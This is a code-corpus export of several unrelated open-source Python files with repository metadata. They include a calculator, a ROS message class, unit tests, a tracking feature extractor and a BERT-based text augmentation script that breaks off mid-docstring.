                              self.feat_stride_p4, self.anchor_scales_p4,self.anchor_ratios_p4,
                              self.feat_stride_p5, self.anchor_scales_p5,self.anchor_ratios_p5,
                              self.feat_stride_p6, self.anchor_scales_p6,self.anchor_ratios_p6,
                              self.allowed_border)
        return {'data': data, 'label': label}
| [
"2081264@qq.com"
] | 2081264@qq.com |
66eaa91bd8b9ba468b7fe3e980d9d3b87fff3a67 | ae88a361b06ec0148794d31c9dcb9d608007a555 | /Problems/Piggy bank/task.py | e6badc571d1a8ccf3722fd63d109e9dfd67b91a0 | [] | no_license | IkDev08/Coffe_Machine.py | 2a689fa4e8105aaa14d92fba92f7c0a6b95b9326 | 2070a44468a7d27ba9397408558bf106984252a6 | refs/heads/master | 2022-12-08T11:37:18.518831 | 2020-08-12T23:26:59 | 2020-08-12T23:26:59 | 286,838,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | class PiggyBank:
def __init__(self, dollars, cents):
self.dollars = dollars
self.cents = cents
def add_money(self, deposit_dollars, deposit_cents):
self.dollars += deposit_dollars + (self.cents + deposit_cents) // 100
self.cents = (self.cents + deposit_cents) % 100
| [
"ikramcodepro@gmail.com"
] | ikramcodepro@gmail.com |
394aae955584b27d44b90dca03f5daec522f9a3d | b2bfd1c01b956b1e21aa231bb2c592498fbdeac4 | /calculator2_old.py | 14bcd4227e3db895fb4e46704e76401c104b0143 | [] | no_license | shlampley/learning | 943cce6d980f7be2dc27773e4906bf357993b3dc | 7c6d1c11e3fe46fdd02eaeb5e4ada66327cb3bfd | refs/heads/main | 2023-06-06T03:03:00.402008 | 2021-06-28T05:08:07 | 2021-06-28T05:08:07 | 374,529,968 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,776 | py |
def add(x, y):
    """Return the sum of x and y."""
    total = x + y
    return total
def subtract(x, y):
    """Return x minus y."""
    difference = x - y
    return difference
def multiply(x, y):
    """Return the product of x and y."""
    product = x * y
    return product
def divide(x, y):
    """Return x divided by y (true division; raises ZeroDivisionError
    when y is zero, exactly like the `/` operator)."""
    quotient = x / y
    return quotient
def _read_number(prompt):
    """Prompt repeatedly until the user enters a valid number.

    Uses float() so negative and decimal values are accepted — the
    original used str.isnumeric(), which rejected both "-2" and "4.5".
    """
    while True:
        text = input(prompt)
        try:
            return float(text)
        except ValueError:
            print("invalid input, must be a number")


def main():
    """Run an interactive four-function calculator.

    Shows a menu, reads an operation choice and two numbers, prints the
    result, and exits after one successful calculation. Invalid menu
    choices re-prompt; division by zero is reported instead of crashing.
    """
    # Menu ("opperation" typo in the original prompts fixed).
    print("select operation. ")
    print("1.Add ")
    print("2.Subtract ")
    print("3.Multiply ")
    print("4.Divide ")

    while True:
        operation = input("enter operation: ")
        if operation not in ("1", "2", "3", "4"):
            print("invalid input")
            continue

        num1 = _read_number("Enter first Number: ")
        num2 = _read_number("Enter second Number: ")

        if operation == "1":
            print(num1, "+", num2, "=", add(num1, num2))
        elif operation == "2":
            print(num1, "-", num2, "=", subtract(num1, num2))
        elif operation == "3":
            print(num1, "*", num2, "=", multiply(num1, num2))
        else:
            # Guard the only operation that can raise ZeroDivisionError.
            if num2 == 0:
                print("invalid input, cannot divide by zero")
                continue
            print(num1, "/", num2, "=", divide(num1, num2))
        break


if __name__ == '__main__':
    main()
| [
"shanelampley09@gmail.com"
] | shanelampley09@gmail.com |
f98415d5d18eb4b792776ce32c19d1c5c5c071ff | 8c16a4c80612d6a0f7917114c01da26447beee17 | /code/ReID_net/Forwarding/MOT15Forwarder.py | 847a576f1920cef5da289341d6f5749b9ea093c8 | [
"MIT"
] | permissive | sbouchardet/PReMVOS | 89d3088593a2d5719537478475362b765f5f82a4 | 0743b632ea7525b2b43f2f31e3891d7437837d84 | refs/heads/master | 2022-09-10T19:38:45.477840 | 2020-06-01T01:51:41 | 2020-06-01T01:51:41 | 268,400,213 | 0 | 0 | MIT | 2020-06-01T01:50:10 | 2020-06-01T01:50:09 | null | UTF-8 | Python | false | false | 4,012 | py | from .Forwarder import Forwarder
import numpy
from ReID_net.Log import log
import time
class MOT15Forwarder(Forwarder):
  """Forwarder for MOT15 tracking sequences: extracts per-detection
  embedding features ("fc1" layer) with the re-ID network and writes them
  (or pairwise similarity scores) to a per-sequence file.

  File uses 2-space indentation; written against a TF-session-style engine.
  """

  def __init__(self, engine):
    super(MOT15Forwarder, self).__init__(engine)
    # Materialize the full concatenated sequence tensor once up front.
    self.data = engine.valid_data.seq_data.eval()
    self.engine = engine

  def forward(self, network, data, save_results=True, save_logits=False):
    """Run feature extraction for every sequence in `data`.
    NOTE(review): save_results/save_logits are accepted for interface
    compatibility but unused here.
    """
    for seq_num in range(data.num_seq):
      T = data.Ts[seq_num]
      # Fixed comparison horizon of 10 frames (T would compare all frames).
      self.window_size = 10
      # self.window_size = T
      seq = data.seq_list[seq_num]
      output_dir = data.data_dir + "/" + seq + "/det/comparison_triplet_features.txt"
      # NOTE(review): file is opened in text mode but
      # _save_intermediate_features pickles into it — Python 2 only.
      outfile = open(output_dir, 'w')
      features = self._extract_intermediate_features(network, data, seq_num)
      # self._compare_features(self.engine, network, data, features,outfile, seq_num)
      self._save_intermediate_features(self.engine, network, data, features,outfile, seq_num)

  def _extract_intermediate_features(self, network, data, seq_num):
  # def _extract_intermediate_features(self, network, data):
    """Run the network over the sequence in chunks of 2*batch_size and
    stack the "fc1" embeddings into an (M, feature_size) array."""
    idx_placeholder = data.idx_placeholder
    batch_size = network.batch_size
    # seq_data = data.seq_data.eval(feed_dict={data.seq_num_placeholder:seq_num})
    # seq_data = data.seq_data
    out_layer = network.tower_layers[0]["fc1"]
    assert len(out_layer.outputs) == 1
    out_feature = out_layer.outputs[0]
    out_feature_size = out_layer.n_features
    features = numpy.empty([0, out_feature_size])
    # m = seq_data.shape[0]
    m = data.Ms[seq_num]
    idx = 0
    while idx < m:
      start = time.time()
      idx_value = [idx, min(idx + 2 * batch_size, m), 0, 1]
      feature_val = self.engine.session.run([out_feature], feed_dict={idx_placeholder: idx_value, data.seq_num_placeholder:seq_num})
      # feature_val = self.engine.session.run([out_feature],feed_dict={idx_placeholder: idx_value})
      features = numpy.concatenate((features, feature_val[0]), axis=0)
      end = time.time()
      elapsed = end - start
      print(min(idx + 2 * batch_size, m), '/', m, "elapsed", elapsed, file=log.v5)
      idx += 2 * batch_size
    return features

  def _compare_features(self, engine, network, data, features,outfile, seq_num):
  # def _compare_features(self, engine, network, data, features, outfile):
    """For each detection, score it against all detections in the next
    `window_size` frames by merging the two embeddings (per `merge_type`)
    and feeding them through the siamese head; writes
    "idx1 idx2 score" lines to `outfile`."""
    y = network.y_softmax
    in_layer = network.tower_layers[0]["siam_concat"]
    assert len(in_layer.outputs) == 1
    in_feature = in_layer.outputs[0]
    merge_type = engine.config.str("merge_type", "")
    start = time.time()
    # seq_data = data.seq_data.eval(feed_dict={data.seq_num_placeholder: seq_num})
    # seq_data = data.seq_data
    # m = seq_data.shape[0]
    m = data.Ms[seq_num]
    # T = int(seq_data[:, 0].max())
    window_size = self.window_size #T #10
    inc = numpy.arange(m)
    # Column 0 of seq_data holds the frame number of each detection.
    seq_data = self.data[data.look_up[seq_num]:data.look_up[seq_num+1],:]
    for idx1 in range(m):
      t = seq_data[idx1, 0]
      t = t.astype(int)
      for future_t in range(t+1,t+window_size+1):
        idx2 = inc[seq_data[:, 0] == future_t]
        feature1 = features[(idx1,) * idx2.size, :]
        feature2 = features[idx2,:]
        if merge_type == "add":
          feature_val = feature1 + feature2
        elif merge_type == "subtract":
          feature_val = feature1 - feature2
        elif merge_type == "abs_subtract":
          feature_val = numpy.abs(feature1 - feature2)
        else:  # merge_type == "concat":
          feature_val = numpy.concatenate((feature1, feature2), axis=1)
        y_val = engine.session.run(y, feed_dict={in_feature: feature_val})
        for i in range(idx2.size):
          outfile.write("%i %i %f\n"%(idx1,idx2[i],y_val[i][1]))
    end = time.time()
    elapsed = end - start
    print("elapsed", elapsed, file=log.v5)
    print(file=log.v4)

  def _save_intermediate_features(self, engine, network, data, features, outfile, seq_num):
    """Pickle the raw feature matrix into `outfile`.
    NOTE(review): engine/network/data/seq_num are unused; `outfile` must be
    binary-compatible with pickle (text mode works only under Python 2).
    """
    import pickle as pickle
    pickle.dump(features,outfile)
    # for idx in range(len(features)):
    #   outfile.write("%i %f\n" % (idx, features[idx,:]))
| [
"jonathon.luiten@rwth-aachen.de"
] | jonathon.luiten@rwth-aachen.de |
77b375ea92af6828ac619b1f95161a31ede5b9e0 | 73d97144ae324f17afc12f198e207f4eaf3ab5f2 | /test/functional/create_cache.py | 3a75a38eb7536824f4e4799f7995b0ca047ee13c | [
"MIT"
] | permissive | fivebalanceID/Fivebalance_V3 | 89437d9bfbdc4f4e60f0f93e7491e061c2361f63 | 353986eb40326fe0c66d9172ea2b0a925b31c734 | refs/heads/master | 2022-06-16T23:13:33.670502 | 2021-05-21T04:57:44 | 2021-05-21T04:57:44 | 186,277,193 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,063 | py | #!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Create a blockchain cache.
Creating a cache of the blockchain speeds up test execution when running
multiple functional tests. This helper script is executed by test_runner when multiple
tests are being run in parallel.
"""
from test_framework.test_framework import FivebalanceTestFramework
class CreateCache(FivebalanceTestFramework):
    """Framework stub whose only job is to trigger blockchain-cache
    creation in setup_chain; it runs no nodes and no actual test."""

    # Test network and test nodes are not required:
    def setup_chain(self):
        # Build the cached chain that other functional tests will reuse.
        self.log.info("Initializing test directory " + self.options.tmpdir)
        # Initialize PoS chain (it will automatically generate PoW chain too)
        self._initialize_chain(toPosPhase=True)

    def set_test_params(self):
        # No nodes are started; CLI support flag kept for framework parity.
        self.num_nodes = 0
        self.supports_cli = True

    def setup_network(self):
        # Intentionally empty: cache creation needs no network.
        pass

    def run_test(self):
        # Intentionally empty: all work happens in setup_chain.
        pass

if __name__ == '__main__':
    CreateCache().main()
| [
"43383911+fivebalanceID@users.noreply.github.com"
] | 43383911+fivebalanceID@users.noreply.github.com |
e8a823a890546c56c66c3bb0dbf0a510a17cf622 | 13f7adf576114c51f9f806a6fc5797b276d93f97 | /devel/lib/python2.7/dist-packages/autoware_msgs/msg/_traffic_light.py | 90177962beab0e196bf6f3c7b6ff861fedd20be4 | [] | no_license | yunjeongkim/keti_ws | a72a5ebc367b208654bdffb5bb9e8372cd959d33 | aaac717c15a7be7431b22fb4ec7a96a734f2e03c | refs/heads/master | 2020-04-05T06:18:52.334522 | 2018-11-21T01:47:34 | 2018-11-21T01:47:34 | 156,633,425 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,252 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from autoware_msgs/traffic_light.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import std_msgs.msg
class traffic_light(genpy.Message):
  """ROS message class for autoware_msgs/traffic_light.

  NOTE: autogenerated by genpy from traffic_light.msg — regenerate from the
  .msg definition rather than editing this class by hand.
  """
  # MD5 fingerprint of the message definition; peers compare it to detect
  # mismatched message versions on the wire.
  _md5sum = "a4931ba214a0e37e220dd00b2acca20a"
  _type = "autoware_msgs/traffic_light"
  _has_header = True #flag to mark the presence of a Header object
  _full_text = """Header header
int32 traffic_light
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
"""
  __slots__ = ['header','traffic_light']
  _slot_types = ['std_msgs/Header','int32']

  def __init__(self, *args, **kwds):
    """
    Constructor. Any message fields that are implicitly/explicitly
    set to None will be assigned a default value. The recommend
    use is keyword arguments as this is more robust to future message
    changes. You cannot mix in-order arguments and keyword arguments.

    The available fields are:
       header,traffic_light

    :param args: complete set of field values, in .msg order
    :param kwds: use keyword arguments corresponding to message field names
    to set specific fields.
    """
    if args or kwds:
      super(traffic_light, self).__init__(*args, **kwds)
      # message fields cannot be None, assign default values for those that are
      if self.header is None:
        self.header = std_msgs.msg.Header()
      if self.traffic_light is None:
        self.traffic_light = 0
    else:
      self.header = std_msgs.msg.Header()
      self.traffic_light = 0

  def _get_types(self):
    """
    internal API method
    """
    return self._slot_types

  def serialize(self, buff):
    """
    serialize message into buffer
    :param buff: buffer, ``StringIO``
    """
    try:
      _x = self
      # Header: seq, stamp.secs, stamp.nsecs packed as three little-endian uint32.
      buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
      _x = self.header.frame_id
      length = len(_x)
      # On Python 3 (or py2 unicode) the string must be UTF-8 encoded before
      # packing; `python3 or ...` short-circuits so `unicode` is never
      # evaluated (and NameError avoided) under Python 3.
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      # Strings are length-prefixed: uint32 length followed by the bytes.
      buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_get_struct_i().pack(self.traffic_light))
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))

  def deserialize(self, str):
    """
    unpack serialized message in str into this message instance
    :param str: byte array of serialized message, ``str``
    """
    # NOTE: the parameter name `str` shadows the builtin; it is kept because
    # this signature is emitted by the genpy generator.
    try:
      if self.header is None:
        self.header = std_msgs.msg.Header()
      end = 0
      _x = self
      start = end
      end += 12
      (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.header.frame_id = str[start:end]
      start = end
      end += 4
      (self.traffic_light,) = _get_struct_i().unpack(str[start:end])
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill

  def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    # Mirrors serialize(); this message has no array fields, so the numpy
    # module is unused but the hook must exist for the genpy API.
    try:
      _x = self
      buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
      _x = self.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_get_struct_i().pack(self.traffic_light))
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))

  def deserialize_numpy(self, str, numpy):
    """
    unpack serialized message in str into this message instance using numpy for array types
    :param str: byte array of serialized message, ``str``
    :param numpy: numpy python module
    """
    # Mirrors deserialize(); no array fields, so numpy is not used here.
    try:
      if self.header is None:
        self.header = std_msgs.msg.Header()
      end = 0
      _x = self
      start = end
      end += 12
      (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.header.frame_id = str[start:end]
      start = end
      end += 4
      (self.traffic_light,) = _get_struct_i().unpack(str[start:end])
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill
# genpy ships a pre-built Struct for a single little-endian uint32 ("<I");
# reuse it instead of compiling our own.
_struct_I = genpy.struct_I


def _get_struct_I():
    """Return the shared uint32 struct packer provided by genpy."""
    global _struct_I
    return _struct_I
_struct_i = None
def _get_struct_i():
global _struct_i
if _struct_i is None:
_struct_i = struct.Struct("<i")
return _struct_i
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
| [
"dallddungi@kaist.ac.kr"
] | dallddungi@kaist.ac.kr |
906eeb2a5472e5b670a01e82a47e15fedcdef251 | ba680f058f072e2950309ed40be8db110b29d24d | /python-primitiv/tests/instance_match.py | 990d4cfb6914632e8260b40d475f155d84deef7d | [
"Apache-2.0"
] | permissive | vbkaisetsu/primitiv | 29fb1b6ae0d544001997b157183e9df71eff1fae | 063c33ed7d3ddb49e56ede55471faaab6f67e063 | refs/heads/develop | 2021-05-07T23:42:11.845122 | 2017-11-03T04:29:23 | 2017-11-03T04:29:23 | 107,549,088 | 0 | 0 | null | 2017-10-19T13:20:40 | 2017-10-19T13:20:39 | null | UTF-8 | Python | false | false | 2,032 | py | from primitiv import Device
from primitiv import Graph
from primitiv import Parameter
from primitiv import Shape
from primitiv import Tensor
from primitiv import initializers as I
from primitiv import operators as F
from primitiv import tensor_operators as tF
from primitiv.devices import Naive
import numpy as np
import unittest
class ArgumentTest(unittest.TestCase):
    """Checks that primitiv's Python wrappers hand back the *same* wrapper
    objects (identity, not mere equality) for devices, graphs and tensors."""

    @classmethod
    def setUpClass(cls):
        pass

    @classmethod
    def tearDownClass(cls):
        pass

    def setUp(self):
        # Fresh default device and graph for every test case.
        self.device = Naive()
        Device.set_default(self.device)
        self.graph = Graph()
        Graph.set_default(self.graph)

    def tearDown(self):
        pass

    def test_device_instance(self):
        # The default device getter must return the exact object we set.
        dev = Device.get_default()
        self.assertIs(dev, self.device)
        tensor = tF.input([0], Shape([]))
        dev = tensor.device()
        self.assertIs(dev, self.device)
        node = F.input([0], Shape([]))
        dev = node.device()
        self.assertIs(dev, self.device)
        # A node built with an explicit device must report that device,
        # not the default one.
        my_device = Naive()
        self.assertIsNot(my_device, self.device)
        node = F.input([0], Shape([]), device=my_device)
        dev = node.device()
        self.assertIs(dev, my_device)
        dev = self.graph.get_device(node)
        self.assertIs(dev, my_device)
        param = Parameter(Shape([]))
        dev = param.device()
        self.assertIs(dev, self.device)

    def test_graph_instance(self):
        g = Graph.get_default()
        self.assertIs(g, self.graph)
        node = F.input([0], Shape([]))
        g = node.graph()
        self.assertIs(g, self.graph)

    def test_tensor_instance(self):
        param = Parameter(Shape([]))
        t_origin = param.gradient
        t = param.gradient
        # Repeated property access must return the same wrapper object.
        self.assertIs(t, t_origin)
        t = Tensor(t_origin)
        # NOTE(review): this compares `t` with itself; the intent was probably
        # `t.to_list() == t_origin.to_list()` — confirm upstream.
        self.assertEqual(t.to_list(), t.to_list())
        self.assertIsNot(t, t_origin)
        t = t_origin
        t *= 2
        # In-place multiply keeps identity ...
        self.assertIs(t, t_origin)
        t = t * 2
        # ... while the binary operator yields a new tensor.
        self.assertIsNot(t, t_origin)
| [
"vbkaisetsu@gmail.com"
] | vbkaisetsu@gmail.com |
8530b6df6d2323c36d60a62c4890586510371443 | 94b5a22e94250322f9e949c2da2fd15bf7a9b84d | /train_aug.py | bc5b876849c699a97a20934f71f0a0d05426d291 | [
"MIT"
] | permissive | Mars-Wei/DD2424 | 7aabc88c72ab31857255bf64363853c6a8714270 | 2d0de060bf27572ad67ae99f8bc17060eab1e4cc | refs/heads/master | 2022-01-19T14:00:29.387999 | 2019-05-21T09:24:30 | 2019-05-21T09:24:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,624 | py | "Fine-tuning BertMasked Model with labeled dataset"
from __future__ import absolute_import, division, print_function
import argparse
import logging
import os
import random
import csv
import numpy as np
import torch
from torch.utils.data import DataLoader, RandomSampler, TensorDataset, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
from tqdm import trange
import shutil
from pytorch_pretrained_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE
from pytorch_pretrained_bert.modeling import BertForMaskedLM
from pytorch_pretrained_bert.tokenization import BertTokenizer
from pytorch_pretrained_bert.optimization import BertAdam
logger = logging.getLogger(__name__)
class InputExample(object):
    """One sequence-classification example.

    ``text_b`` stays ``None`` for single-sequence tasks and ``label`` stays
    ``None`` for unlabeled (test) examples.
    """

    def __init__(self, guid, text_a, text_b=None, label=None):
        """Store the example fields.

        Args:
            guid: Unique id for the example.
            text_a: string. Untokenized text of the first sequence.
            text_b: (Optional) string. Second sequence, for pair tasks only.
            label: (Optional) string. Label for train/dev examples.
        """
        (self.guid, self.text_a, self.text_b, self.label) = (
            guid, text_a, text_b, label)
class InputFeatures(object):
    """Feature arrays for one (possibly masked) training example.

    ``init_ids`` holds the unmasked token ids, ``input_ids`` the masked ones;
    ``masked_lm_labels`` is -1 everywhere except the masked positions.
    """

    def __init__(self, init_ids, input_ids, input_mask, segment_ids, masked_lm_labels):
        (self.init_ids,
         self.input_ids,
         self.input_mask,
         self.segment_ids,
         self.masked_lm_labels) = (init_ids, input_ids, input_mask,
                                   segment_ids, masked_lm_labels)
class DataProcessor(object):
    """Base class for data converters for sequence classification data sets."""

    def get_train_examples(self, data_dir):
        """Gets a collection of `InputExample`s for the train set."""
        raise NotImplementedError()

    def get_dev_examples(self, data_dir):
        """Gets a collection of `InputExample`s for the dev set."""
        raise NotImplementedError()

    def get_labels(self):
        """Gets the list of labels for this data set."""
        raise NotImplementedError()

    @classmethod
    def _read_csv(cls, input_file, quotechar='"'):
        """Read *input_file* as CSV and return ``(row_index, row)`` pairs.

        Each element is an ``enumerate`` tuple — downstream code indexes the
        row via ``line[1]``, so that shape is part of the contract.  The
        header row (index 0) is dropped.
        """
        with open(input_file, "r", encoding='UTF-8') as handle:
            parsed = csv.reader(
                handle,
                delimiter=",",
                quotechar=quotechar,
                doublequote=True,
                skipinitialspace=False,
            )
            numbered = list(enumerate(parsed))
        # Drop the (0, header) entry; like the original `del`, this raises
        # IndexError on a completely empty file.
        del numbered[0]
        return numbered
class AugProcessor(DataProcessor):
    """Processor for the dataset that will be augmented."""

    def get_train_examples(self, data_dir):
        """See base class."""
        rows = self._read_csv(os.path.join(data_dir, "train.csv"))
        return self._create_examples(rows, "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        rows = self._read_csv(os.path.join(data_dir, "dev.csv"))
        return self._create_examples(rows, "dev")

    def get_labels(self, name):
        """Return the label set for dataset *name*; add new datasets here."""
        if name in ("toxic",):
            return ["0", "1"]
        return None

    def _create_examples(self, lines, set_type):
        """Turn ``(index, row)`` pairs from _read_csv into InputExamples.

        The first column of each row is the text and the last column the
        label; ``text_b`` is unused for this single-sequence task.
        """
        examples = []
        for position, numbered_row in enumerate(lines):
            row = numbered_row[1]
            guid = "%s-%s" % (set_type, position)
            examples.append(InputExample(guid, row[0], None, row[-1]))
        return examples
def convert_examples_to_features(examples, label_list, max_seq_length, tokenizer):
    """Convert `InputExample`s into masked-LM `InputFeatures`.

    Each example's text is WordPiece-tokenized, truncated to
    ``max_seq_length - 2`` tokens and wrapped in [CLS]/[SEP].  Following the
    BERT pre-training recipe, ~15% of the tokens (at most 20) are chosen for
    masking: 80% become [MASK], 10% keep the original token and 10% are
    replaced by a random token drawn from the same sentence.  The example's
    class label is stored in ``segment_ids`` so generation can be
    label-conditioned.

    (Cleanup vs. the original: the dead locals ``a = examples``,
    ``dupe_factor`` and ``tokens_b`` were removed; behavior is unchanged.)

    Args:
        examples: iterable of InputExample with ``text_a`` and ``label`` set.
        label_list: all labels; their order defines the integer label ids.
        max_seq_length: fixed (padded) sequence length.
        tokenizer: BERT tokenizer exposing tokenize()/convert_tokens_to_ids().

    Returns:
        list of InputFeatures (``init_ids`` unmasked, ``input_ids`` masked).
    """
    label_map = {label: i for i, label in enumerate(label_list)}
    features = []
    masked_lm_prob = 0.15
    # Fixed seed keeps the masking pattern reproducible across runs.
    rng = random.Random(123)
    max_predictions_per_seq = 20
    for (ex_index, example) in enumerate(examples):
        tokens_a = tokenizer.tokenize(example.text_a)
        # Reserve two positions for [CLS] and [SEP].
        if len(tokens_a) > max_seq_length - 2:
            tokens_a = tokens_a[:(max_seq_length - 2)]
        tokens = ["[CLS]"] + tokens_a + ["[SEP]"]
        label_id = label_map[example.label]
        segment_ids = [label_id] * len(tokens)
        # -1 marks positions that do not contribute to the masked-LM loss.
        masked_lm_labels = [-1] * max_seq_length
        cand_indexes = []
        for (i, token) in enumerate(tokens):
            if token == "[CLS]" or token == "[SEP]":
                continue
            cand_indexes.append(i)
        rng.shuffle(cand_indexes)
        len_cand = len(cand_indexes)
        output_tokens = list(tokens)
        num_to_predict = min(max_predictions_per_seq,
                             max(1, int(round(len(tokens) * masked_lm_prob))))
        masked_lms_pos = []
        covered_indexes = set()
        for index in cand_indexes:
            if len(masked_lms_pos) >= num_to_predict:
                break
            if index in covered_indexes:
                continue
            covered_indexes.add(index)
            masked_token = None
            # 80% of the time, replace with [MASK]
            if rng.random() < 0.8:
                masked_token = "[MASK]"
            else:
                # 10% of the time, keep original
                if rng.random() < 0.5:
                    masked_token = tokens[index]
                # 10% of the time, replace with random word
                else:
                    masked_token = tokens[cand_indexes[rng.randint(0, len_cand - 1)]]
            masked_lm_labels[index] = tokenizer.convert_tokens_to_ids([tokens[index]])[0]
            output_tokens[index] = masked_token
            masked_lms_pos.append(index)
        init_ids = tokenizer.convert_tokens_to_ids(tokens)
        input_ids = tokenizer.convert_tokens_to_ids(output_tokens)
        # The mask has 1 for real tokens and 0 for padding tokens. Only real
        # tokens are attended to.
        input_mask = [1] * len(input_ids)
        # Zero-pad up to the sequence length.
        padding = [0] * (max_seq_length - len(input_ids))
        init_ids += padding
        input_ids += padding
        input_mask += padding
        segment_ids += padding
        assert len(init_ids) == max_seq_length
        assert len(input_ids) == max_seq_length
        assert len(input_mask) == max_seq_length
        assert len(segment_ids) == max_seq_length
        if ex_index < 5:
            logger.info("*** Example ***")
            logger.info("guid: %s" % (example.guid))
            logger.info("tokens: %s" % " ".join(
                [str(x) for x in tokens]))
            logger.info("init_ids: %s" % " ".join([str(x) for x in init_ids]))
            logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
            logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
            logger.info(
                "segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
            logger.info("masked_lm_labels: %s" % " ".join([str(x) for x in masked_lm_labels]))
        features.append(
            InputFeatures(init_ids=init_ids,
                          input_ids=input_ids,
                          input_mask=input_mask,
                          segment_ids=segment_ids,
                          masked_lm_labels=masked_lm_labels))
    return features
def remove_wordpiece(tokens):
    """Collapse a BERT WordPiece token list back into a plain sentence.

    The list is walked from the end so in-place deletions never disturb the
    indices still to be visited:
      * "[PAD]" tokens are dropped;
      * a "##xxx" continuation piece is glued onto the previous token.
    The leading "[CLS]" and trailing "[SEP]" markers are stripped by the
    final ``[1:-1]`` slice before joining with spaces.

    Fixes vs. the original: the parameter no longer shadows the builtin
    ``str``, and deletion uses ``del tokens[i]`` — ``list.remove`` deleted
    the first *equal* element, which removed the wrong token whenever the
    sequence contained duplicate pieces.

    Args:
        tokens: mutable list of WordPiece tokens (modified in place).

    Returns:
        The reassembled sentence as a single space-joined string.
    """
    if len(tokens) > 1:
        for i in range(len(tokens) - 1, 0, -1):
            if tokens[i] == '[PAD]':
                del tokens[i]
            elif len(tokens[i]) > 1 and tokens[i].startswith('##'):
                tokens[i - 1] += tokens[i][2:]
                del tokens[i]
    return " ".join(tokens[1:-1])
def main():
    """CLI entry point: parse augmentation hyper-parameters and run run_aug()."""
    parser = argparse.ArgumentParser()
    # Required parameters
    parser.add_argument("--data_dir", default="datasets", type=str,
                        help="The input data dir. Should contain the .tsv files (or other data files) for the task.")
    parser.add_argument("--output_dir", default="aug_data", type=str,
                        help="The output dir for augmented dataset")
    parser.add_argument("--bert_model", default="bert-base-uncased", type=str,
                        help="The path of pretrained bert model.")
    parser.add_argument("--task_name", default="toxic", type=str,
                        help="The name of the task to train.")
    parser.add_argument("--max_seq_length", default=128, type=int,
                        help="The maximum total input sequence length after WordPiece tokenization. \n"
                             "Sequences longer than this will be truncated, and sequences shorter \n"
                             "than this will be padded.")
    # NOTE(review): `action='store_true'` combined with `default=True` means
    # this flag can never be turned off from the command line — confirm
    # whether the default should be False.
    parser.add_argument("--do_lower_case", default=True, action='store_true',
                        help="Set this flag if you are using an uncased model.")
    parser.add_argument("--train_batch_size", default=32, type=int,
                        help="Total batch size for training.")
    parser.add_argument("--learning_rate", default=5e-5, type=float,
                        help="The initial learning rate for Adam.")
    parser.add_argument("--num_train_epochs", default=3.0, type=float,
                        help="Total number of training epochs to perform.")
    parser.add_argument("--warmup_proportion", default=0.1, type=float,
                        help="Proportion of training to perform linear learning rate warmup for. "
                             "E.g., 0.1 = 10%% of training.")
    parser.add_argument('--seed', type=int, default=42,
                        help="random seed for initialization")
    args = parser.parse_args()
    print(args)
    # save_every_epoch=True: checkpoint the model after every augmentation epoch.
    run_aug(args, save_every_epoch=True)
def run_aug(args, save_every_epoch=False):
    """Augment the training set with a fine-tuned BertForMaskedLM.

    Each epoch restores the pristine training file (``train_origin.csv``),
    masks roughly 1/7 of the real token positions of every example (at least
    2), and appends two augmented variants per example to ``train.csv`` —
    one built from the model's top-1 predictions at the masked positions and
    one from its top-2 predictions.  A per-epoch snapshot
    ``train_epoch_{e}.csv`` is also written.

    Args:
        args: parsed argparse namespace (see main()).
        save_every_epoch: checkpoint the model after every epoch when True,
